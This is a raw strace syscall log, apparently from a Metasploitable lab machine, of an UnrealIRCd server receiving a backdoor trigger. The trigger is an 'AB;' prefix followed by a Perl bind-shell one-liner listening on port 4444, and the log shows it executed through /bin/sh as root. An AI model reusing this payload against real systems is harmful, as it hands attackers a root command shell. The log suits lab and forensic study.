4519  07:09:45.738265 select(1024, [2 3 4 7 9], [], NULL, {0, 930000}) = 1 (in [2], left {0, 780000})

4519  07:09:45.891614 clock_gettime(CLOCK_MONOTONIC, {995, 708641066}) = 0

4519  07:09:45.891646 accept(2, 0, NULL) = 8

4519  07:09:45.891673 getpeername(8, {sa_family=AF_INET, sin_port=htons(36971), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:09:45.891717 fcntl64(8, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:09:45.891737 fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:09:45.891757 setsockopt(8, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:09:45.891777 setsockopt(8, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:09:45.891795 setsockopt(8, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:09:45.891813 getsockopt(8, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:09:45.891900 setsockopt(8, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:09:45.891924 clock_gettime(CLOCK_MONOTONIC, {995, 708940973}) = 0

4519  07:09:45.891943 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 10

4519  07:09:45.891962 fcntl64(10, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:09:45.891976 fcntl64(10, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:09:45.891989 fcntl64(10, F_SETFD, FD_CLOEXEC) = 0

4519  07:09:45.892003 connect(10, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:09:45.892025 send(10, "\372o\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:09:45.892106 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:09:45.892177 gettimeofday({1495624185, 892183}, NULL) = 0

4519  07:09:45.892195 select(1024, [2 3 4 5 6 7 9 10], [], NULL, {1, 0}) = 1 (in [10], left {0, 990000})

4519  07:09:45.897239 clock_gettime(CLOCK_MONOTONIC, {995, 714259189}) = 0

4519  07:09:45.897259 recvfrom(10, "\372o\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\263\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:09:45.897302 close(10)         = 0

4519  07:09:45.897319 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:09:45.897339 send(8, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:09:45.897398 time(NULL)        = 1495624185

4519  07:09:45.897411 time(NULL)        = 1495624185

4519  07:09:45.897424 gettimeofday({1495624185, 897427}, NULL) = 0

4519  07:09:45.897436 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:09:45.897465 clock_gettime(CLOCK_MONOTONIC, {995, 714478457}) = 0

4519  07:09:45.897476 gettimeofday({1495624185, 897480}, NULL) = 0

4519  07:09:45.897487 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 870000})

4519  07:09:46.025758 clock_gettime(CLOCK_MONOTONIC, {995, 842776827}) = 0

4519  07:09:46.025778 recv(7, "PRIVMSG  #testit2 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59

4519  07:09:46.025802 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025822 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025838 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025852 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025866 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025881 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025895 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025909 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025922 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025936 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025950 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025973 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.025987 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026001 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026014 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026028 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026042 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026056 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026070 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026084 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026098 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026112 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:46.026130 gettimeofday({1495624186, 26133}, NULL) = 0

4519  07:09:46.026142 select(1024, [2 3 4 5 6 7 8 9], [5], NULL, {1, 0}) = 2 (in [8], out [5], left {1, 0})

4519  07:09:46.026193 clock_gettime(CLOCK_MONOTONIC, {995, 843205878}) = 0

4519  07:09:46.026205 send(5, ":bot3!bot3@Test-CAD1B1ED PRIVMSG #testit2 :BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\r\n", 85, 0) = 85

4519  07:09:46.026251 recv(8, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:09:46.026281 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:09:46.026301 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:09:46.026314 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:09:46.026329 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5606

5606  07:09:46.026414 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5606  07:09:46.026429 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5606  07:09:46.026440 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5606  07:09:46.026454 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5606  07:09:46.026560 brk(0)            = 0x80f9000

5606  07:09:46.026582 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.026600 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3a000

5606  07:09:46.026616 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.026635 open("/etc/ld.so.cache", O_RDONLY) = 1

5606  07:09:46.026649 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5606  07:09:46.026667 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f32000

5606  07:09:46.026678 close(1)          = 0

5606  07:09:46.026689 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.026705 open("/lib/libncurses.so.5", O_RDONLY) = 1

5606  07:09:46.026728 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5606  07:09:46.026828 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5606  07:09:46.026847 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f02000

5606  07:09:46.026859 mmap2(0xb7f2f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f2f000

5606  07:09:46.026877 close(1)          = 0

5606  07:09:46.026889 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.026904 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5606  07:09:46.026918 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5606  07:09:46.027009 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5606  07:09:46.027027 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7efe000

5606  07:09:46.027038 mmap2(0xb7f00000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f00000

5606  07:09:46.027054 close(1)          = 0

5606  07:09:46.027065 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.027080 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5606  07:09:46.027094 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5606  07:09:46.027184 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5606  07:09:46.027201 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efd000

5606  07:09:46.027203 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dae000

5606  07:09:46.027203 mmap2(0xb7ef7000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ef7000

5606  07:09:46.027220 mmap2(0xb7efa000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7efa000

5606  07:09:46.027234 close(1)          = 0

5606  07:09:46.027257 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dad000

5606  07:09:46.027269 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dad6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5606  07:09:46.027326 mprotect(0xb7ef7000, 4096, PROT_READ) = 0

5606  07:09:46.027363 munmap(0xb7f32000, 29913) = 0

5606  07:09:46.027389 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5606  07:09:46.027404 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5606  07:09:46.027424 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb2f4f0) = -1 ENOTTY (Inappropriate ioctl for device)

5606  07:09:46.027454 brk(0)            = 0x80f9000

5606  07:09:46.027464 brk(0x80fa000)    = 0x80fa000

5606  07:09:46.027476 brk(0x80fb000)    = 0x80fb000

5606  07:09:46.027493 getuid32()        = 0

5606  07:09:46.027503 getgid32()        = 0

5606  07:09:46.027512 geteuid32()       = 0

5606  07:09:46.027521 getegid32()       = 0

5606  07:09:46.027535 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5606  07:09:46.027549 time(NULL)        = 1495624186

5606  07:09:46.027562 brk(0x80fc000)    = 0x80fc000

5606  07:09:46.027577 brk(0x80fd000)    = 0x80fd000

5606  07:09:46.027597 open("/proc/meminfo", O_RDONLY) = 1

5606  07:09:46.027618 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5606  07:09:46.027644 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f39000

5606  07:09:46.027657 read(1, "MemTotal:      1035240 kB\nMemFree:        643808 kB\nBuffers:         63356 kB\nCached:         172952 kB\nSwapCached:          0 kB\nActive:         251888 kB\nInactive:       113392 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        643568 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5580 kB\nWriteback:           0 kB\nAnonPages:      128972 kB\nMapped:          52000 kB\nSlab:            14900 kB\nSReclaimable:     6968 kB\nSUnreclaim:       7932 kB\nPageTables:       1992 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5606  07:09:46.027744 close(1)          = 0

5606  07:09:46.027755 munmap(0xb7f39000, 4096) = 0

5606  07:09:46.027767 brk(0x80fe000)    = 0x80fe000

5606  07:09:46.027794 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5606  07:09:46.027807 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5606  07:09:46.027820 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5606  07:09:46.027832 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5606  07:09:46.027844 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5606  07:09:46.027856 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5606  07:09:46.027870 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5606  07:09:46.027882 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5606  07:09:46.027895 uname({sys="Linux", node="metasploitable", ...}) = 0

5606  07:09:46.027944 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5606  07:09:46.027962 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5606  07:09:46.027981 brk(0x8100000)    = 0x8100000

5606  07:09:46.027993 getcwd("/etc/unreal", 4096) = 12

5606  07:09:46.028008 getpid()          = 5606

5606  07:09:46.028024 getppid()         = 4519

5606  07:09:46.028041 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5606  07:09:46.028061 stat64("/sbin/sh", 0xbfb2f4c8) = -1 ENOENT (No such file or directory)

5606  07:09:46.028077 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5606  07:09:46.028095 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5606  07:09:46.028120 socket(PF_FILE, SOCK_STREAM, 0) = 1

5606  07:09:46.028140 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5606  07:09:46.028154 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5606  07:09:46.028177 close(1)          = 0

5606  07:09:46.028189 socket(PF_FILE, SOCK_STREAM, 0) = 1

5606  07:09:46.028199 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5606  07:09:46.028210 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5606  07:09:46.028228 close(1)          = 0

5606  07:09:46.028242 open("/etc/nsswitch.conf", O_RDONLY) = 1

5606  07:09:46.028256 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5606  07:09:46.028273 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f39000

5606  07:09:46.028284 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5606  07:09:46.028334 read(1, "", 4096) = 0

5606  07:09:46.028344 close(1)          = 0

5606  07:09:46.028353 munmap(0xb7f39000, 4096) = 0

5606  07:09:46.028370 open("/etc/ld.so.cache", O_RDONLY) = 1

5606  07:09:46.028383 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5606  07:09:46.028399 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f32000

5606  07:09:46.028410 close(1)          = 0

5606  07:09:46.028420 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.028436 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5606  07:09:46.028451 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5606  07:09:46.028540 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5606  07:09:46.028558 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da4000

5606  07:09:46.028570 mmap2(0xb7dab000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dab000

5606  07:09:46.028587 close(1)          = 0

5606  07:09:46.028598 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.028612 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5606  07:09:46.028626 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5606  07:09:46.028769 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

5606  07:09:46.028787 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8c000

5606  07:09:46.028799 mmap2(0xb7da0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7da0000

